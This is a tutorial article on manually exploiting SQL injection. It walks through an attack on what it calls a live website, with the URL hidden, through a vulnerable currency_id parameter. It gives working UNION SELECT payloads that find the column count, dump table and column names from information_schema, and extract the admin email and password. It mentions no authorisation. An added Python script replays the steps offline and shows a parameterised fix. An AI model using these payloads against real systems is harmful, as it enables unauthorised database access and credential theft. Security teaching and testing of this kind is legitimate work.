
Manual Exploitation for SQL Injection

SQL Injection is one of the most critical vulnerabilities in a web application. OWASP and Wikipedia describe it as a code injection technique in which an attacker alters the back-end SQL query by manipulating user input. It is also very easy to exploit: a simple Google search turns up hundreds of SQL injection tools that even a beginner can run.

In this article we will manually exploit a SQL Injection vulnerability and retrieve data from the database behind it. We assume you have basic knowledge of SQL Injection and the related tools. The steps are described below:

Step: 1

We have hidden the actual URL of the website as we are taking a live site example. Let’s look at the following URL.

[Screenshot: normal response of the currency lookup URL, showing AFN]

In this URL the currency_id parameter is vulnerable to SQL Injection. We can verify this by putting a single quote after the value of currency_id. In our case the value is 1, so the URL will look like this:
http://————————ajax.php?action=currency&currency_id=1'

[Screenshot: SQL error returned by the server]

Just by adding the single quote we get a SQL error in the browser. The quote broke the syntax of the query the application builds from this parameter, which tells us the input is concatenated into the query without escaping or parameter binding. That confirms the parameter is injectable, and because the error is echoed back to us, the following steps are easy.

Step: 2

Next we need to find the number of columns the original query returns and which of them are displayed on the page. We can do this with a UNION statement in the URL. UNION is a SQL operator that joins the result sets of two SELECT queries, and it only works when both sides return the same number of columns. So the URL will look like this:
URL:
http://————————ajax.php?action=currency&currency_id=1 union all select 1
When we open the URL in the browser, we get the following error.

[Screenshot: MySQL error about a different number of columns]

It means the query executing behind this URL returns a different number of columns than our SELECT. So our target, as mentioned above, is to find the right number of columns. This is done by adding one value at a time to the UNION SELECT, each separated by a comma, as follows.

http://————————ajax.php?action=currency&currency_id=1 union all select 1,2

[Screenshot: the same column-count error]

After running this in the browser we get the same error, which means we still need to add more columns. We keep adding values to the URL until we get a response without the SQL error.

URL  Response
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3  Same error in the browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4  Same error in the browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4,5  Same error in the browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4,5,6  Same error in the browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4,5,6,7  Same error in the browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4,5,6,7,8  Different message

Finally we get a different message in the browser after putting 8 values in the request. It means the query executing behind this page returns 8 columns.

[Screenshot: the page output after the 8-column UNION, showing 45]

The output shown in the browser is also very important. It is not the number 45: it is the values from the 4th and 5th positions of our SELECT printed next to each other, which tells us that only columns 4 and 5 of the query are displayed by the page. Whatever we put in those two positions is evaluated by the database server and its result is returned to the browser, so those are the slots through which we will read data.

Step: 3

Now we will find the name of the current database and the version of the database server. This is done with simple MySQL functions placed in the 4th and 5th positions, as follows:
http://——————–/admin/ajax.php?action=currency&currency_id=1 union select 1,2,3,database(),version(),6,7,8

[Screenshot: output of database() and version()]

database(): a MySQL function that returns the name of the current database.
version(): a MySQL function that returns the version of the MySQL server.

We use both functions in the URL and see their output in the screenshot above. The first value is the database name and the second is the database version.

Step: 4

So far we have extracted the database name and version through the injected query. The next thing to find is the table names in the database. This is a bit tricky: from a MySQL terminal, SHOW TABLES lists all the tables, but that command does not work here, because only a SELECT can be joined to the original query with UNION.

So we have to use a different technique. information_schema is a database present in every MySQL instance that stores metadata about all the databases the server maintains, so we can read the table names of the database identified in the previous step from there. The query looks as follows. Remember that everything we inject has to go into the 4th and 5th positions, as explained in the step above, and that the subquery has to return a single value, which is why group_concat() is used to pack every table name into one string.

http://——–/admin/ajax.php?action=currency&currency_id=999999.9 union all select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6,7

[Screenshot: table names returned by the query]

As can be seen in the screenshot above, our query executed successfully on the server and all the table names are displayed in the browser as its output. Let's analyse the query.

currency_id is set to 999999.9, a value that matches no real row, so the only row the page renders is the one our UNION adds.
information_schema.tables is the table that stores information about every table on the server. We select from it the rows whose table_schema equals the current database name, which the database() function supplies. group_concat(table_name) joins all those table names into one comma-separated string, so the subquery returns a single value for position 4.

Step: 5

So far we have collected the database name and all the table names by injecting queries. Next we need the column names of a particular table. The admin table most likely holds the admin details of the application, so let's collect the column names of that table with the following query.

http://———admin/ajax.php?action=currency&currency_id=999999.9 union all select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="admin"),4,2,3,4-- -

[Screenshot: column names of the admin table, including AdminID]

Since information_schema holds all the information about databases and tables, this time we concatenate the column_name values from information_schema.columns where table_schema equals the current database (given by database()) and table_name equals admin, the table name we extracted in the previous step. The trailing -- comments out whatever the application appends after our input.

Step: 6

The final and most important thing to extract from the database is the data itself. We already know the database name, table name and column names, so extracting the data from the table is simple. Let's do it.
http://——————/admin/ajax.php?action=currency&currency_id=999999.9+union+all+select+1,2,3,(select+concat(admin.AdminEmail)+from+——-.admin+Order+by+AdminID+limit+0,1),1,2,3,4-- -
[Screenshot: admin email address returned by the query]

As we can see, the admin email address appears in the screenshot as the output of the injected query. Let's run another query that returns the password of the admin.

http://——–/admin/ajax.php?action=currency&currency_id=999999.9+union+all+select+1,2,3,(select+concat(admin.Password)+from+test.admin+Order+by+AdminID+limit+0,1),1,2,3,4-- -
[Screenshot: admin password returned by the query]

Finally, we have successfully extracted the admin's email address and password from the database. Because the injected subquery is limited to one row at a time, changing limit 0,1 to limit 1,1, limit 2,1 and so on walks through the remaining rows of the table.
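As an added example that is not part of the original article, the following Python script replays Steps 1 to 6 offline against an in-memory SQLite database. SQLite stands in for the MySQL server, so sqlite_master and pragma_table_info() take the place of information_schema.tables and information_schema.columns, sqlite_version() takes the place of version(), and there is no database() equivalent. The currency and admin tables, their eight columns and the sample rows are constructed to mirror what the screenshots show and are not taken from the real site. The script also shows the parameterised lookup that closes the hole: against it the single-quote probe raises no error and the UNION payload returns nothing.

```python
"""Offline reconstruction of the manual UNION-based extraction walked through above.

Added example, not the article's or the target site's code. SQLite stands in
for MySQL, so these stand-ins are assumptions of the example:
  * sqlite_master / pragma_table_info() replace information_schema.tables/.columns
  * sqlite_version() replaces version(); SQLite has no database()
The schema and rows below are constructed to mirror the article's screenshots.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE currency (id INTEGER, code TEXT, name TEXT, symbol TEXT,
                           rate REAL, c6 TEXT, c7 TEXT, c8 TEXT);
    INSERT INTO currency VALUES (1, 'AFN', 'Afghan afghani', 'Af', 1.0, '', '', '');
    CREATE TABLE admin (AdminID INTEGER, AdminEmail TEXT, Password TEXT);
    INSERT INTO admin VALUES (1, 'admin@example.test', 's3cret');  -- constructed sample
""")


def vulnerable_lookup(currency_id: str):
    """Mirrors what ajax.php?action=currency does: the parameter is pasted
    straight into the statement text, so the caller controls the SQL."""
    return conn.execute("SELECT * FROM currency WHERE id=" + currency_id).fetchall()


def safe_lookup(currency_id: str):
    """Hardened form: the value is bound as data and can never become SQL."""
    return conn.execute("SELECT * FROM currency WHERE id=?", (currency_id,)).fetchall()


def is_injectable(lookup) -> bool:
    """Step 1: a bare single quote only raises a database error when the
    input is spliced into the statement text."""
    try:
        lookup("1'")
        return False
    except sqlite3.OperationalError:
        return True


def find_column_count(lookup, max_cols=20):
    """Step 2: grow the UNION ALL SELECT list until the column-count mismatch
    error disappears. Returns None if nothing up to max_cols works."""
    for n in range(1, max_cols + 1):
        payload = "1 UNION ALL SELECT " + ",".join(str(i) for i in range(1, n + 1))
        try:
            lookup(payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def reflected(rows) -> str:
    """The page only prints columns 4 and 5 of each row; with the 1..8 probe
    that is the '45' the article sees in the browser."""
    return "".join(f"{row[3]}{row[4]}" for row in rows)


def union_extract(lookup, expr: str) -> str:
    """Steps 3-6: put an expression or scalar subquery in the reflected 4th slot.
    999999.9 matches no real row, so the only row rendered is the injected one."""
    payload = f"999999.9 UNION ALL SELECT 1,2,3,({expr}),5,6,7,8"
    return str(lookup(payload)[0][3])


if __name__ == "__main__":
    print("injectable (vulnerable, safe):",
          is_injectable(vulnerable_lookup), is_injectable(safe_lookup))
    print("columns:", find_column_count(vulnerable_lookup))
    print("reflected:", reflected(vulnerable_lookup(
        "999999.9 UNION ALL SELECT 1,2,3,4,5,6,7,8")))
    print("version:", union_extract(vulnerable_lookup, "sqlite_version()"))
    print("tables:", union_extract(vulnerable_lookup,
          "SELECT group_concat(name) FROM sqlite_master WHERE type='table'"))
    print("admin columns:", union_extract(vulnerable_lookup,
          "SELECT group_concat(name) FROM pragma_table_info('admin')"))
    print("admin email:", union_extract(vulnerable_lookup,
          "SELECT AdminEmail FROM admin ORDER BY AdminID LIMIT 0,1"))
    print("admin password:", union_extract(vulnerable_lookup,
          "SELECT Password FROM admin ORDER BY AdminID LIMIT 0,1"))
```

Run it directly to print each step's result. find_column_count is the automated form of the manual counting in Step 2; note that against the parameterised lookup the probe never errors, so its first iteration would "succeed" with nothing injected, which is why the script confirms injectability with the single-quote test before counting columns.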

About the Author:

Nikhil Kumar, a Certified Ethical Hacker, works as a Information Security Consultant. He has experience in web application pen-testing, social engineering, password cracking and android pen-testing. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure.


